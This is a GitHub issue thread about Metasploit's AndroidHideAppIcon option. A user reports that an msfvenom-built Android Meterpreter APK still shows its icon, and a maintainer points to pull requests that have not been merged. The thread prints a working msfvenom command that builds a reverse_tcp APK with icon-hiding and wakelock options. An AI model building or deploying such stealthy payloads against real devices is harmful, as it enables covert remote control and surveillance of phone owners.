### ISSUE TITLE
msfvenom android autohide app icon problem

### ISSUE THREAD

**Issue by backtoback1** [rapid7/metasploit-framework#9166]
Hello 
i just test the AndroidHideAppIcon options of android payload to hide the icon automatically 
for this i use this command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 AndroidHideAppIcon=true AndroidMeterpreterDebug=true AndroidWakelock=true -a dalvik --platform android R -o app.apk 

But after installing it the icon it's still there and not hidden anymore 

Thanks 
Regards

**Comment by timwr** [comment]
It's not implemented yet. You'll have to wait until this: https://github.com/rapid7/metasploit-framework/pull/9126 has been merged. If you need it before then you can check out that code (including the payload changes) and start using it immediately :)

**Comment by backtoback1** [comment]
@timwr  Thanks you for your replay 
can you please give the code

**Comment by timwr** [comment]
It's here: https://github.com/rapid7/metasploit-payloads/pull/245 and https://github.com/rapid7/metasploit-framework/pull/9126

**Comment by backtoback1** [comment]
@timwr  i add it manually but it's still not hidden after install 
and there is other problem it's open many session one after one without no stopping
i tried with reverse_tcp 
and it's android java meterpreter 
waiting until metasploit fix this problems 
Thanks a lot mr.timwr

**Comment by backtoback1** [comment]
@timwr not add yet ??
